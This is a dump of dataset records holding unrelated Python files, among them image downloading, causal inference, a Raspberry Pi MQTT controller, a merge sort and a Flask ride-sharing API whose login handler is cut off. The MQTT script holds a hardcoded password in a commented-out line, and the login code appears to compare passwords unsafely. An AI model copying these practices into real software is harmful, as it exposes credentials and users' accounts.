self.package\n","sub_path":"supybot/plugins/Judd/uddcache/packages.py","file_name":"packages.py","file_ext":"py","file_size_in_byte":16033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
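# A minimal usage sketch for the Release/Package API above -- not part of
# uddcache itself. It assumes a psycopg2 connection to a database with the
# 'packages'/'sources' tables the queries above reference; the DSN and the
# package name are placeholders.
import psycopg2

def show_depends(dsn="dbname=udd"):
    conn = psycopg2.connect(dsn)
    # Search squeeze and sid, preferring squeeze via the simple rank-order pins.
    release = Release(conn, arch="amd64",
                      release=["squeeze", "sid"],
                      pins={"squeeze": 2, "sid": 1})
    pkg = release.Package("bash")
    if pkg.Found():
        # Each entry holds the alternatives from one comma-separated clause.
        for options in pkg.DependsList():
            print(options)
    else:
        print("only virtual?", pkg.IsVirtualOnly())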
+{"seq_id":"81777618","text":"from pprint import pprint\r\nimport math\r\nimport pygame\r\nfrom pygame.locals import *\r\nimport sys\r\n\r\n\r\ncsv_file = open('TOEIC.csv','r')\r\nline = csv_file.readline()\r\nline = csv_file.readline()\r\ncounter = []\r\nhumidity = []\r\ntemperature = []\r\nwhile line:\r\n list = line.split(\";\")\r\n if(len(list) > 1): \r\n counter.append(float(list[1]))\r\n humidity.append(float(list[4])) \r\n temperature.append(float(list[8]))\r\n line = csv_file.readline()\r\ncsv_file.close()\r\n#print(counter)\r\n#print(humidity)\r\n#print(temperature)\r\n\r\ntemperature_per_hour = []\r\ni = 0\r\nfor i in range(12, len(counter), 12):\r\n\taverage = sum(temperature[i-12:i])/12\r\n\taverage2 = average\r\n\ttemperature_per_hour += [average2]\r\n\tprint(average2)\r\nprint(temperature_per_hour)\r\n\r\n\r\n\r\n\r\n\r\ncsv_climate_file = open('CountryClimate.csv','r')\r\ncsv_climate_file.readline()\r\nline = csv_climate_file.readline()\r\ntemp = {}\r\n#humid = []\r\nwhile line:\r\n\tlist = line.split(',')\r\n\tif(len(list) > 1):\r\n\t\t# country.append()\r\n\t\t#humid.append(int(list[2]))\r\n\t\ttemp[list[0]] = int(list[1])\r\n\tline = csv_climate_file.readline()\r\ncsv_climate_file.close()\r\n# print(country)\r\nprint(temp)\r\n\r\n\r\nfor i in range(len(temperature_per_hour)):\r\n\tclimate_temp_n = [(x[0], abs(x[1] - temperature_per_hour[i])) for x in temp.items()] #itemsのところで辞書のすべてを持ってきてる\r\n\tclimate_temp_n = sorted(climate_temp_n, key=lambda x: x[1]) #データのソートを行う\r\n\r\n\r\n\tprint(str(i) + ': ' + ','.join([value[0] for value in climate_temp_n if value[1] == climate_temp_n[0][1]])) #もし値が同じほかの国があればそれも出力する(配列を結合してる)\r\n\r\n\r\n\r\n","sub_path":"123.py","file_name":"123.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"476084909","text":"# Copyright (c) Karan Desai (https://kdexd.xyz), The University of Michigan.\n\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport io\nimport os\n\nimport requests\nfrom PIL import Image\n\n\nclass ImageDownloader(object):\n r\"\"\"\n Download an image from a URL and save it on disk. This downloader handles\n multiple edge-cases, and is specifcially suited for RedCaps images, all of\n which are sourced from Reddit (``i.redd.it``), Imgur (``i.imgur.com``) or\n Flickr (``farm.static.flickr.com``).\n\n Args:\n longer_resize: Resize the longer edge of image to this size before\n saving to disk (preserve aspect ratio). Set to -1 to avoid any\n resizing. Defaults to 512.\n \"\"\"\n\n def __init__(self, longer_resize: int = 512):\n self.longer_resize = longer_resize\n\n def download(self, url: str, save_to: str) -> bool:\n r\"\"\"\n Download image from ``url`` and save it to ``save_to``.\n\n Args:\n url: Image URL to download from.\n save_to: Local path to save the downloaded image.\n\n Returns:\n Boolean variable indicating whether the download was successful\n (``True``) or not (``False``).\n \"\"\"\n\n try:\n # 'response.content' will have our image (as bytes) if successful.\n response = requests.get(url)\n\n # Check if image was downloaded (response must be 200). One exception:\n # Imgur gives response 200 with \"removed.png\" image if not found.\n if response.status_code != 200 or \"removed.png\" in response.url:\n return False\n\n # Write image to disk if it was downloaded successfully.\n pil_image = Image.open(io.BytesIO(response.content)).convert(\"RGB\")\n\n # Resize image to longest max size while preserving aspect ratio if\n # longest max size is provided (not -1), and image is bigger.\n if self.longer_resize > 0:\n image_width, image_height = pil_image.size\n\n scale = self.longer_resize / float(max(image_width, image_height))\n\n if scale != 1.0:\n new_width, new_height = tuple(\n int(round(d * scale)) for d in (image_width, image_height)\n )\n pil_image = pil_image.resize((new_width, new_height))\n\n # Save the downloaded image to disk.\n os.makedirs(os.path.dirname(save_to), exist_ok=True)\n pil_image.save(save_to)\n\n return True\n\n except Exception:\n return False\n","sub_path":"redcaps/downloaders/image_downloader.py","file_name":"image_downloader.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"119311292","text":"#!/usr/bin/python\n#-*-coding:utf-8-*-\n\nimport sys, traceback, Ice\nIce.loadSlice(\"./ice-redis.ice\")\nimport CommandArea, DemoArea, YXArea\nimport time\n\nstatus = 0\nic = None\ntry:\n ic = Ice.initialize(sys.argv)\n base = ic.stringToProxy(\"DataCommand:default -h 192.168.100.170 -p 10000\")\n DataCommand = CommandArea.DataCommandPrx.checkedCast(base)\n if not DataCommand:\n raise RuntimeError(\"Invalid proxy\")\n \n pIDs = []\n yxdata = []\n for i in range(5):\n pIDs.append(i)\n structyxdata = YXArea.DxDTYX(i, i+10, i)\n yxdata.append(structyxdata)\n \n station = 1\n pID=1\n datetime1 = \"20190515000000\"\n datetime2 = \"20190515180000\"\n datetime = \"20190515120000\"\n datetime0 = \"20190515\"\n \n # redis写入遥信数据\n #yxstatus = DataCommand.RPCSaveYXData(station, pIDs, yxdata)\n #print(yxstatus)\n \n # 实时数据读取\n #yxstatus,yxdata = DataCommand.RPCGetRealtimeYXData (station, pIDs)\n \n # 时间点数据读取\n #yxstatus,yxdata = DataCommand.RPCGetTimePointYXData (station, datetime, pIDs)\n \n # 单点某天全部数据读取\n #yxstatus,yxdata = DataCommand.RPCGetDayYXData (station, datetime0, pID)\n\n # 多点某天全部数据读取\n #yxstatus,pIDNum,yxdata = DataCommand.RPCGetDayYXDatas (station, datetime0, pIDs)\n \n # 单点时间段数据获取函数\n yxstatus,yxdata = DataCommand.RPCGetPeriodYXData(station, datetime1, datetime2, pID)\n \n print(yxstatus)\n #print(pIDNum) \n \n for i in range(len(yxdata)):\n print(yxdata[i].status, yxdata[i].value, yxdata[i].timetag)\n\nexcept:\n traceback.print_exc()\n status = 1\n\nif ic:\n try:\n ic.destroy()\n except:\n traceback.print_exc()\n status = 1\nsys.exit(status)\n","sub_path":"ice/20190515-station/yxdata_client.py","file_name":"yxdata_client.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"300547013","text":"import os, sys\r\n\r\n#sys.path.append(r\"C:\\Users\\Administrator\\Downloads\\dowhy-master-0514\")\r\nsys.path.append(r\"C:\\Users\\Administrator\\Downloads\\dowhy-master\")\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport networkx as nx\r\nimport random as rd\r\nfrom sklearn.utils import shuffle\r\nimport multiprocessing as mp\r\nimport time\r\nfrom sklearn.metrics import roc_auc_score\r\n\r\n\r\nimport dowhy\r\nfrom dowhy.do_why import CausalModel\r\n\r\ndef BuildAM(par, t, data_type):\r\n k = par[\"k\"]\r\n path = par[\"path\"]\r\n os.chdir(path)\r\n if(t == \"cg\"):\r\n G = nx.complete_graph(10)\r\n am = nx.to_pandas_adjacency(G)\r\n elif(t == \"half\"):\r\n am = pd.read_table(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\causal_compare\\\\data_e\\\\inter_\" + str(k) + \".txt\", header=None)\r\n am = CreatPesudoAM(am)\r\n elif(t == \"mmhc\"):\r\n am = pd.read_csv(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\causal_compare\\\\data_e\\\\\" + par[\"i\"] + \"_\" + par[\"j\"] + \"\\\\mmhc\\\\\"+ data_type+ \"_adjacent_matrix_\" + str(k) + \".csv\", index_col=0)\r\n elif(t == \"sparcc\"):\r\n p = pd.read_table(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\causal_compare\\\\data_e\\\\\" + par[\"i\"] + \"_\" + par[\"j\"] + \"\\\\SparCC\\\\p_\" + str(k) + \".txt\", index_col=0)\r\n am = pd.DataFrame(np.zeros([p.shape[0], p.shape[0]]))\r\n am.columns = [\"sp\" + str(i) for i in range(p.shape[0])]\r\n am.index = [\"sp\" + str(i) for i in range(p.shape[0])]\r\n for s in range(p.shape[0]):\r\n for t in range(p.shape[1]):\r\n if(p.ix[s, t] <= 0.05):\r\n am.ix[s, t] = 1\r\n elif(t == \"true\"):\r\n am = pd.read_table(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\causal_compare\\\\data_e\\\\inter_\" + str(k) + \".txt\", header=None)\r\n label = [\"sp\" + str(i) for i in range(len(am))]\r\n am.index = label; am.columns = label\r\n #am = pd.DataFrame(am, index=label, columns=label)\r\n return am\r\n\r\ndef CreatPesudoAM(TrueAM, proba=0.5):\r\n PesudoAM = np.matrix(TrueAM) + np.diag([0.5] * len(TrueAM))\r\n TrueAM = np.matrix(TrueAM) + np.diag([0.5] * len(TrueAM))\r\n index_positive = np.argwhere(TrueAM != 0)\r\n index_negative = np.argwhere((TrueAM + np.diag([1] * len(TrueAM))) == 0)\r\n for x, y in rd.sample(list(index_positive), int(len(index_positive) * proba)):\r\n loc = rd.choice(index_negative)\r\n PesudoAM[x, y], PesudoAM[loc[0], loc[1]] = 0, PesudoAM[x, y]\r\n index_negative = np.delete(index_negative, loc, axis=0)\r\n return pd.DataFrame(PesudoAM)\r\n\r\n\r\ndef getAllEdges(am, vertices):\r\n edges_array = []\r\n for i in range(len(am)):\r\n for j in range(len(am)):\r\n if am.ix[i, j] != 0:\r\n edges_array.append((vertices[j], vertices[i],)) # edges_list : [(source, target),()]\r\n return edges_array\r\n\r\n\r\ndef CreatGML(am, vertices, treatment, outcome):\r\n edges_list = getAllEdges(am, vertices)\r\n gml_graph = 'graph[directed 1 '\r\n gml_graph = gml_graph + \" \".join(['node[ id \"{0}\" label \"{0}\"]'.format(n) for n in vertices])\r\n gml_graph = gml_graph + \" \".join(['edge[ source \"{0}\" target \"{1}\"]'.format(s, t) for s, t in edges_list])\r\n gml_graph = gml_graph + ']'\r\n return gml_graph\r\n\r\n\r\ndef CreatData(dat, am, treatment=\"sp0\", outcome=\"sp1\"):\r\n treatment = treatment\r\n outcome = outcome\r\n vertices = list(am.index)\r\n gml_graph = CreatGML(am, vertices, treatment, outcome)\r\n\r\n ret_dict = {\r\n \"df\": dat,\r\n \"treatment_name\": treatment,\r\n \"outcome_name\": outcome,\r\n # \"common_causes_names\": 
common_causes,\r\n # \"instrument_names\": instruments,\r\n \"gml_graph\": gml_graph,\r\n }\r\n return ret_dict\r\n\r\ndef CalDoWhy(dat):\r\n model = CausalModel(\r\n data=dat[\"df\"],\r\n treatment=dat[\"treatment_name\"],\r\n outcome=dat[\"outcome_name\"],\r\n graph=dat[\"gml_graph\"]\r\n )\r\n\r\n # Identification\r\n identified_estimand = model.identify_effect()\r\n\r\n # Estimation\r\n causal_estimate = model.estimate_effect(identified_estimand,\r\n method_name=\"backdoor.linear_regression\")\r\n\r\n return causal_estimate\r\n\r\ndef CalPvalue(dat, value):\r\n nullmodel = []\r\n c = 0\r\n while(True):\r\n try:\r\n dat[\"df\"] = shuffle(dat[\"df\"])\r\n causal_estimate = CalDoWhy(dat)\r\n nullmodel.append(causal_estimate.value)\r\n except ValueError:\r\n c -= 1\r\n finally:\r\n c += 1\r\n if c == 1000:\r\n break\r\n p_value = sum([1 if nullmodel[s] > abs(value) else 0 for s in range(len(nullmodel))]) / len(nullmodel)\r\n print(p_value)\r\n return p_value\r\n\r\ndef main(count, am):\r\n label = [\"sp\" + str(i) for i in range(len(am))]\r\n value = pd.DataFrame(np.zeros([am.shape[0], am.shape[0]]), index=label, columns=label)\r\n p = pd.DataFrame(np.ones([am.shape[0], am.shape[0]]), index=label, columns=label)\r\n for i in range(am.shape[0]):\r\n for j in range(am.shape[0]):\r\n if (i != j):\r\n start_time = time.time()\r\n treatment = label[i]\r\n outcome = label[j]\r\n dat = CreatData(count, am, treatment, outcome)\r\n try:\r\n causal_estimate = CalDoWhy(dat)\r\n value.ix[j, i] = causal_estimate.value\r\n except ValueError:\r\n value.ix[j, i] = 0\r\n continue\r\n print(causal_estimate)\r\n pvalue = CalPvalue(dat, causal_estimate.value)\r\n print(pvalue)\r\n p.ix[j, i] = pvalue\r\n print(\"***************************\"+str(time.time()-start_time)+\"***********\")\r\n return value, p\r\n\r\n\r\ndef StandardOutput(am, t, method, k, path, data_type=\"RA\", matrix_type=\"am\"):\r\n if(not os.path.exists(path +\"\\\\DoWhy\")):\r\n os.mkdir(path +\"\\\\DoWhy\")\r\n os.chdir(path +\"\\\\DoWhy\")\r\n print(os.getcwd())\r\n if (not os.path.exists(method + \"_\" + t + str(1))):\r\n os.makedirs(method + \"_\" + t + str(1))\r\n am = pd.DataFrame(am)\r\n am.columns = [\"sp\" + str(i) for i in range(am.shape[0])]\r\n am.index = [\"sp\" + str(i) for i in range(am.shape[0])]\r\n if (matrix_type == \"am\"):\r\n am.to_csv(method + \"_\" + t + str(1) + \"\\\\\" + data_type + \"_adjacent_matrix_\" + str(k) + \".csv\")\r\n elif (matrix_type == \"p\"):\r\n am.to_csv(method + \"_\" + t + str(1) +\"\\\\\" + data_type + \"_p_\" + str(k) + \".csv\")\r\n\r\ndef matrix2array(m):\r\n a = []\r\n for i in range(m.shape[0]):\r\n for j in range(m.shape[1]):\r\n if(i != j):\r\n a.append(m.ix[i, j])\r\n return a\r\n\r\ndef threshold(prior_am, est_am):\r\n label = matrix2array(prior_am)\r\n prob = matrix2array(est_am)\r\n return roc_auc_score(label, prob)\r\n\r\ndef func(par):\r\n k = par[\"k\"]\r\n path = par[\"path\"]\r\n os.chdir(path)\r\n\r\n aa = pd.read_table(\"AA_\" + str(k) + \".txt\", index_col=0).T\r\n ra = pd.read_table(\"RA_\" + str(k) + \".txt\", index_col=0).T\r\n\r\n for t in [\"sparcc\"]:\r\n for data_type in [ \"AA\"]:#\"RA\",\r\n start_time = time.time()\r\n am_prior = BuildAM(par, t, data_type)\r\n print(am_prior)\r\n if (data_type == \"AA\"):\r\n am, p = main(aa, am_prior)\r\n elif (data_type == \"RA\"):\r\n am, p = main(ra, am_prior)\r\n StandardOutput(am, t, method=\"DoWhy\", k=k, data_type=data_type, matrix_type=\"am\", path=path)\r\n StandardOutput(p, t, method=\"DoWhy\", k=k, data_type=data_type, 
matrix_type=\"p\", path=path)\r\n print(\"running time is \" + str(time.time() - start_time))\r\n\r\nif __name__ == \"__main__\":\r\n pool = mp.Pool(processes=30)\r\n for k in range(1, 101):\r\n for i in [\"gLV\", \"hubbell\", \"soi\"]:\r\n if(i == \"gLV\"):\r\n s = [\"CS\"]#,\"TS\", \"TS_dense\"\r\n else:\r\n s = [\"CS\"]#,\"TS\"\r\n for j in s:\r\n path = \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\causal_compare\\\\data_e\\\\\" + i + \"_\" + j\r\n par = {\r\n \"i\": i,\r\n \"j\": j,\r\n \"k\": k,\r\n \"path\": path\r\n }\r\n #func(par)\r\n pool.apply_async(func, (par,))\r\n pool.close()\r\n pool.join()","sub_path":"code/3_inference/dowhy/init_temp.py","file_name":"init_temp.py","file_ext":"py","file_size_in_byte":8234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"195330973","text":"def mergeSort(A, p, r):\n '''Merge-sort\n A: The array to be sorted.\n p: The starting index.\n r: The ending index.'''\n\n if r > p:\n q = (p + r) // 2\n mergeSort(A, p, q)\n mergeSort(A, q+1, r)\n merge(A, p, q, r)\n\n\ndef merge(A, p, q, r):\n L = A[p:q+1]\n R = A[q+1:r+1]\n L.append(float('inf'))\n R.append(float('inf'))\n i, j = 0, 0\n for k in range(p, r+1):\n if L[i] <= R[j]:\n A[k] = L[i]\n i = i + 1\n else:\n A[k] = R[j]\n j = j + 1\n\n\nimport random\n\nif __name__ == '__main__':\n arr1 = [1,5,2,7,3,4,6,9,0,8]\n arr2 = [-2,-3,0,1,3,2,-1]\n arr3 = [1,1,2,2,0,0,-1,-2,-3]\n\n mergeSort(arr1, 0, len(arr1)-1)\n mergeSort(arr2, 0, len(arr2)-1)\n mergeSort(arr3, 0, len(arr3)-1)\n print(arr1)\n print(arr2)\n print(arr3)\n\n arr_rand = [random.choice(list(range(-9,10))) for i in range(10)]\n\n print(\"before:\", arr_rand)\n mergeSort(arr_rand, 0, len(arr_rand)-1)\n print(\"sorted:\", arr_rand)\n","sub_path":"ch2/2.3/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"472890315","text":"class SimplePlayer:\n def __init__(self):\n self.loc = None\n self.board = None\n self.directions = [(1, 0), (0, 1), (-1, 0), (0, -1)]\n\n def set_game_params(self, board):\n self.board = board\n for i, row in enumerate(board):\n for j, val in enumerate(row):\n if val == 1:\n self.loc = (i, j)\n break\n\n def state_score(self, board, loc):\n num_steps_available = 0\n for d in self.directions:\n i = loc[0] + d[0]\n j = loc[1] + d[1]\n if 0 <= i < len(board) and 0 <= j < len(board[0]) and board[i][j] == 0: # then move is legal\n num_steps_available += 1\n\n if num_steps_available == 0:\n return -1\n else:\n return 4 - num_steps_available\n\n def count_ones(self, board):\n counter = 0\n for i, row in enumerate(board):\n for j, val in enumerate(row):\n if val == 1:\n counter += 1\n return counter\n\n def make_move(self, time): # time parameter is not used, we assume we have enough time.\n\n assert self.count_ones(self.board) == 1\n\n prev_loc = self.loc\n self.board[prev_loc] = -1\n\n assert self.count_ones(self.board) == 0\n\n best_move, best_move_score, best_new_loc = None, float('-inf'), None\n for d in self.directions:\n i = self.loc[0] + d[0]\n j = self.loc[1] + d[1]\n\n if 0 <= i < len(self.board) and 0 <= j < len(self.board[0]) and self.board[i][j] == 0: # then move is legal\n new_loc = (i, j)\n # print('prev loc', prev_loc, 'new_loc:', new_loc, 'move:', (i, j))\n assert self.board[new_loc] == 0\n self.board[new_loc] = 1\n assert self.count_ones(self.board) == 1\n\n score = self.state_score(board=self.board, loc=(i, j))\n if score > best_move_score:\n best_move, best_move_score, best_new_loc = d, score, new_loc\n self.board[new_loc] = 0\n assert self.count_ones(self.board) == 0\n\n\n if best_move is None:\n # print(self.board)\n exit()\n\n self.board[best_new_loc] = 1\n\n assert self.count_ones(self.board) == 1\n\n self.loc = best_new_loc\n # print('returning move', best_move)\n return best_move\n\n def set_rival_move(self, loc):\n self.board[loc] = -1\n","sub_path":"SimplePlayer.py","file_name":"SimplePlayer.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"449468564","text":"import RPi.GPIO as GPIO # Import Raspberry Pi GPIO library\nGPIO.setwarnings(False) # Ignore warning for now\nGPIO.setmode(GPIO.BCM)\nimport paho.mqtt.client as mqtt\nimport logging\nimport time\n\nimport buttons\nimport sunscreens\n\nclass NoRunningFilter(logging.Filter):\n def filter(self, record):\n return False\n\ndef init():\n global logger\n\n my_filter = NoRunningFilter()\n logging.getLogger(\"apscheduler.scheduler\").addFilter(my_filter)\n logging.getLogger(\"apscheduler.executors.default\").addFilter(my_filter)\n \n logging.basicConfig(filename='/home/pi/share/pr/hahoau/headless/logging.log',level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n logger = logging.getLogger(__name__)\n logger.info('Start')\n buttons.init()\n sunscreens.init()\n \ndef exit():\n buttons.exit()\n sunscreens.exit()\n logger.info('Stop\\n\\n\\n')\n\ndef on_message(client, userdata, message):\n print(\"message received \" ,str(message.payload.decode(\"utf-8\")))\n print(\"message topic=\",message.topic)\n print(\"message qos=\",message.qos)\n print(\"message retain flag=\",message.retain)\n sunscreens.control(4, str(message.payload.decode(\"utf-8\")), 100) \n\ninit()\n\n#client =mqtt.Client(\"pi_device\")\n#client.on_message=on_message #attach function to callback\n#client.username_pw_set(\"esp32\", \"hH809814\")\n#client.connect(\"hassio.local\")\n#client.subscribe(\"homeassistant/pi/no1/sunscreen4\")\n#client.loop_start() #start the loop\n\nwhile True:\n time.sleep(0.3)\n\n#message = raw_input(\"Press enter to quit\\n\\n\") # Run until someone presses enter\nexit()\nGPIO.cleanup() # Clean up\n#client.loop_stop() #stop the loop\n","sub_path":"headless/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"561799842","text":"import pymysql\nfrom sauron.metrics import Metric, MetricException\n\n\nclass SphinxMetric(Metric):\n def __init__(self, name, host='127.0.0.1', port=9306, **kwargs):\n Metric.__init__(self, name, **kwargs)\n self.reconfig(name, host, port)\n\n def reconfig(self, name, host='127.0.0.1', port=9306, **kwargs):\n Metric.reconfig(self, name, **kwargs)\n self.host = host\n self.port = port\n self.conn = None\n self.cur = None\n\n def __del__(self):\n try:\n self.cur.close()\n self.conn.close()\n except AttributeError:\n pass\n\n def values(self):\n try:\n self.conn = pymysql.connect(host=self.host, port=self.port)\n self.cur = self.conn.cursor()\n self.cur.execute('show status')\n r = dict(self.cur.fetchall())\n return {\n 'results' : {\n 'uptime' : (r['uptime'], 'Seconds'),\n 'queries' : (r['queries'], 'Count'),\n 'avg_wall' : (r['avg_query_wall'], 'Seconds'),\n 'avg_cpu' : (r['avg_query_cpu'], 'Percent'),\n 'avg_read' : (r['avg_query_readkb'], 'Kilobytes')\n }\n }\n except pymysql.err.MySQLError:\n raise MetricException('Error connecting to sphinx searchd')\n except KeyError:\n raise MetricException('Could not find all keys in searchd status')\n","sub_path":"sauron/metrics/SphinxMetric.py","file_name":"SphinxMetric.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"355614046","text":"from action_broker.shared.oas_clients import card_broker_client\nfrom hamcrest import assert_that, equal_to\ndef send_acquire_card_request(game_id=None, card_id=None, player_id=None):\n \"\"\"\n fetches game card list from card service based on game_id\n \"\"\"\n _, result = card_broker_client.cardOperations.acquire_card(\n acquireCardRequest={\n 'playerId': player_id,\n 'cardId': card_id,\n 'gameId': game_id\n }\n ).result()\n assert_that(result.status_code, equal_to(200))\n\n return True\n\ndef confirm_card_supply(game_id=None, card_id=None):\n \"\"\"\n fetch supply of a given card\n \"\"\"\n supply, result = card_broker_client.gameInfo.check_card_supply(\n gameId=game_id,\n cardId=card_id\n ).result()\n assert_that(result.status_code, equal_to(200))\n\n return (supply['supply'] > 0)\n\ndef send_draw_card_request(player_id):\n _, result = card_broker_client.cardOperations.draw_player_card(\n playerId=player_id\n ).result()\n assert_that(result.status_code, equal_to(200))\n\ndef send_curse_players_request(cursing_player=None, game_id=None):\n _, result = card_broker_client.cardOperations.curse_players(\n cursePlayersRequest={\n 'gameId': game_id,\n 'cursingPlayerId': cursing_player\n }\n ).result()\n assert_that(result.status_code, equal_to(200))\n","sub_path":"action_broker/shared/card_broker_calls.py","file_name":"card_broker_calls.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"351842907","text":"from flask import Flask, jsonify, request, json, Response, render_template\nfrom flask_cors import CORS\nfrom flask_mysqldb import MySQL\nfrom flask import abort\nfrom datetime import datetime\nfrom flask_bcrypt import Bcrypt\nfrom flask_jwt_extended import JWTManager\nfrom flask_jwt_extended import create_access_token\n\nimport Seat_Geek_API as SGE\nfrom Database_Layer.dbController import DBController\nimport DB_config, hashlib\n\napp = Flask(__name__)\n\n# CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\nCORS(\n app\n) # Need this to allow requests between client and server for Cross-origin resource sharing\napp.config[\"MYSQL_HOST\"] = DB_config.MYSQL_HOST\napp.config[\"MYSQL_USER\"] = DB_config.MYSQL_USER\napp.config[\"MYSQL_PASSWORD\"] = DB_config.MYSQL_PASSWORD\napp.config[\"MYSQL_DB\"] = DB_config.MYSQL_DB\napp.config[\"CORS_HEADERS\"] = DB_config.CORS_HEADERS\napp.config[\"MYSQL_CURSORCLASS\"] = DB_config.MYSQL_CURSORCLASS\napp.config[\"JWT_SECRET_KEY\"] = DB_config.JWT_SECRET_KEY\nmysql = MySQL(app)\nbcrypt = Bcrypt(app)\njwt = JWTManager(app)\n\n\n@app.route(\n \"/index\", methods=[\"GET\"]\n) # handles route of home page in backend send required data to react\ndef index():\n events = SGE.Seat_Geek_Api()\n print()\n if request.args:\n filterValue = ((request.args.get(\"filterValue\")).split(\"%20\"))[0]\n searchValue = request.args.get(\"searchValue\")\n print(\"filterValue is\", filterValue, \"searchValue is\", searchValue)\n if filterValue == \"City\":\n eventsdata = events.getByVenue(searchValue)\n elif filterValue == \"Date\":\n eventsdata = events.getByDate(searchValue)\n elif filterValue == \"Performer\":\n eventsdata = events.getByPerformer(searchValue.replace(\" \", \"-\"))\n elif filterValue == \"No Filter\" and searchValue != \"\":\n eventsdata = events.getByQuery(searchValue.replace(\" \", \"+\"))\n else:\n eventsdata = events.getallEvents()\n\n else:\n print(\"No filter arguments found\")\n eventsdata = events.getallEvents()\n return eventsdata\n\n\n@app.route(\"/getusers/\", methods=[\"GET\"])\ndef getUsers(userid):\n cursor = mysql.connection.cursor()\n connection = mysql.connection\n controller = DBController(cursor, connection)\n response = controller.getUser(userid)\n\n print(\"db op\", response)\n return response\n\n\n@app.route(\n \"/event/\", methods=[\"GET\"]\n) # handles route of Event page in backend send required data to react\ndef event(eventId):\n event = SGE.Seat_Geek_Api()\n eventdata = event.getEvent(eventId)\n return eventdata\n\n\n@app.route(\"/signup\", methods=[\"POST\"]) # handles route of signup page\ndef signup():\n try:\n if request.method == \"POST\":\n print(\"Signup is hit!!\")\n data = request.get_json(silent=True)\n print(\"Received data is\", request.get_json())\n cursor = mysql.connection.cursor()\n connection = mysql.connection\n controller = DBController(cursor, connection)\n response = controller.enterUser(data)\n\n if response == \"Success\":\n returnData = {\"response\": response}\n print(\"Sending resposne\", returnData)\n return returnData\n elif response == \"Email already present. 
Try a new email-id\":\n returnData = {\"response\": response}\n print(\"Sending resposne\", returnData)\n return {\"response\": response}\n else:\n print(\"error is:\", response)\n (abort(500, {\"response\": response}))\n\n except Exception as e:\n print(\"error:\", e)\n return e\n\n\n@app.route(\"/offerRide\", methods=[\"GET\", \"POST\"]) # handles route of signup page\ndef offerRide():\n try:\n if request.method == \"POST\":\n\n data = request.get_json(silent=True)\n print(\"Received offer ride data is\", request.get_json())\n cursor = mysql.connection.cursor()\n connection = mysql.connection\n controller = DBController(cursor, connection)\n response = controller.saveOfferRide(data)\n if response == \"Success\":\n returnData = {\"response\": response}\n print(\"Sending resposne\", returnData)\n return returnData\n else:\n print(\"error is:\", response)\n (abort(500, {\"response\": response}))\n\n except Exception as e:\n print(\"error:\", e)\n return e\n\n\n@app.route(\"/saveRequest\", methods=[\"GET\", \"POST\"])\ndef save_request():\n data = request.get_json(silent=True)\n RideID = data.get(\"rideId\")\n eventID = data.get(\"eventId\")\n userID = data.get(\"userId\")\n status = \"pending\"\n # print(RideID, eventID, userID, status)\n cursor = mysql.connection.cursor()\n connection = mysql.connection\n controller = DBController(cursor, connection)\n # controller.saveRequest(\"124\", \"1\", \"ageldartp\", \"pending\")\n controller.saveRequest(RideID, eventID, userID, status)\n Response = app.response_class()\n return Response\n\n\n@app.route(\"/users/modifyRequest\", methods=[\"POST\"])\ndef modifyRequest():\n data = request.get_json(silent=True)\n cursor = mysql.connection.cursor()\n connection = mysql.connection\n controller = DBController(cursor, connection)\n if data[\"status\"] in [\"accepted\", \"declined\"]:\n result = controller.updateRequest(data[\"requestId\"], data[\"status\"])\n if result == data[\"status\"]:\n return result\n else:\n response = json.loads(\n json.dumps(\n {\"status\": \"error\", \"message\": \"Error while modifying request\"}\n )\n )\n (abort(500, {\"response\": response}))\n else:\n response = json.loads(\n json.dumps({\"status\": \"error\", \"message\": \"Invalid status. 
Please check\"})\n )\n (abort(500, {\"response\": response}))\n\n\n@app.route(\n \"/event/rides/\", methods=[\"GET\"]\n) # handles route of Event page in backend send required data to react\ndef rides(eventId):\n # eventId = 4704993 # hardcoded as we have data for this few events only\n cursor = mysql.connection.cursor()\n connection = mysql.connection\n controller = DBController(cursor, connection)\n print(\"user id is: \", request.args.get(\"userId\"))\n if \"userId\" in request.args and (\n request.args.get(\"userId\") not in [\"\", \"None\", \"undefined\"]\n ): # condition to check if userId is sent in request\n response = controller.getrides_username(\n eventId, request.args.get(\"userId\")\n ) # sending offered rides data without his own rides\n else:\n response = controller.getrides_wo_username(\n eventId\n ) # sending all offered rides data for any given event\n return response\n\n\n@app.route(\"/users/login\", methods=[\"POST\"])\ndef login():\n # cur = mysql.connection.cursor()\n email = request.get_json()['email']\n password = request.get_json()['password'].encode('utf-8')\n # result = \"\"\n\n cursor = mysql.connection.cursor()\n connection = mysql.connection\n controller = DBController(cursor, connection)\n rv = controller.Userlogin(email,password)\n\n # cur.execute(\"SELECT * FROM USER where email_id = '\" + str(email) + \"'\")\n # rv = cur.fetchone()\n print(rv)\n if rv['PASSWORD'] == 